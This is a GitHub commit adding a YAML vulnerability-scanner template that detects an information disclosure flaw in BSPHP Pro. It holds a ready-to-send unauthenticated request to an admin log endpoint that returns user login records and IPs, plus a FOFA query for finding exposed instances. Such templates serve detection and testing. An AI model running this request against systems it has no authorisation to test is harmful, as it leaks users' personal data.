Create bsphp-info.yaml

patch-1
Ritik Chaddha 2023-08-07 18:26:48 +05:30 committed by GitHub
parent c50ad342f9
commit 3c377343bd
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: bsphp-info
info:
name: BSPHP - Information Disclosure
author: ritikchaddha
severity: low
description: Information disclosure in BSPHP Pro causing user and unauth IP disclosure.
metadata:
max-request: 1
verified: true
fofa-query: title="BSPHP"
tags: bsphp,info,disclosure
http:
- method: GET
path:
- '{{BaseURL}}/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0'
matchers-condition: and
matchers:
- type: word
words:
- '{"data":'
- '"id"'
- '"user"'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200